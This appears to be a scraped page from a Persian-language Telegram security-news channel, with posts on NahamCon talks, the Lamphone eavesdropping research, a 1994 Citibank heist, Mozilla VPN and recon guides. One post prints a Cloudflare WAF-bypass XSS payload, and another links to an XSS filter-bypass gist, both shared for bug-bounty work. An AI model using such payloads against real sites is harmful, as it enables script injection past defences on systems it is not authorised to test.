امنیت اطلاعات
848 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
دور زدن فیلترها در حملات XSS در جایی که تگ a قابل تزریق است

https://gist.github.com/hackerscrolls/49b0a6edf955097fa8f92ddbf2eddbc9


#xss
#bugbounty


@sec_nerd
فایل های ارائه های روز اول کنفرانس مجازی NahamCon


👇👇👇



@sec_nerd
فایل های ارائه های روز اول کنفرانس مجازی NahamCon


👆👆👆



@sec_nerd
در طی یک تحقیق دانشگاهی، اخیرا محققان اعلام کردند که میتوان از اثر ارتعاشات صوتی بر روی نور لامپ های درون ساختمان، مکالمات افراد حاضر در محیط را با روش های مهندسی معکوس بدست آورد!

در این روش با استفاده از تلسکوپ و یک لنز الکترو اوپتیکال میتوان تغییرات انتشار نور لامپ را که توسط صداهای اطراف ایجاد میشود دریافت و آنها را به صدای اصلی برگرداند.

این روش Lamphone نام دارد


لینک مقاله:
https://ad447342-c927-414a-bbae-d287bde39ced.filesusr.com/ugd/a53494_443addc922e048d89a664c2423bf43fd.pdf


خلاصه توضیحات به همراه ویدئو:
https://www.zdnet.com/article/lamphone-attack-lets-threat-actors-recover-conversations-from-your-light-bulb/


#news
#surveillance


@sec_nerd
در چنین روزی در سال 1994 یک گروه هکری روس با هدایت فردی به نام ولادیمیر لِوین توانست 10.7 میلیون دلار از Citibank سرقت کند.
در آن زمان از شبکه های X.25 استفاده میشد.
این نخستین سرقت از بانک با روشهای هک شبکه بود.
لوین در سال 1995 در لندن دستگیر و برای تحمل حبس سه ساله در سال 1998 به امریکا تحویل داده شد.


#history

@sec_nerd
Cloudlflare XSS WAF bypass

<script>
https://window.name=`<img src=x onerror=alert(top.document.domain)>`
location=`https://domain/?xss=<iframe src=javascript:src=https://top.name>x</iframe>`
</script>


#xss #cf #bugbounty


@sec_nerd
TBHMv4 Recon.pdf
12.2 MB
ارائه ی jason haddix در روز دوم کنفرانس امنیتی آنلاین #nahamcon

با عنوان:
the bug hunter’s methodology

@sec_nerd
این هم امنیت در سال ۲۰۲۰


@sec_nerd
جای دیگه هم نه ... اتاق خواب!

#fun
#shodan


@sec_nerd
موزیلا اعلام کرد طی هفته های آینده Mozilla VPN را عرضه خواهد کرد
پیش از این در سال ۲۰۱۹ Firefox Private Networks VPN در ایالات متحده بصورت آزمایشی عرضه شد که در نسخه ی نهایی و جهانی با تغییر نگرش و ساختار به Mozilla VPN تبدیل شده است و میتواند خارج از محیط مرورگر فایرفاکس، عمل روتینگ را در سیستم عامل و سایر مرورگرها نیز صورت دهد.

این وی پی ان از وایرگارد استفاده میکند.نسخه پیشین این طرح از کلودفلر بهره میبرد.

این سرویس در امریکا با قیمت 4.99 دلار در ماه برای شروع ارائه خواهد شد.


اطلاعات بیشتر:
https://www.hackread.com/mozilla-vpn-firefox-private-network-vpn-coming/


#news #firefox
#vpn

@sec_nerd
راهکار دیگری برای شناسایی و جمع آوری اطلاعات از اهداف برای نفوذگران

https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/


#recon
#bugbounty
#pentest



@sec_nerd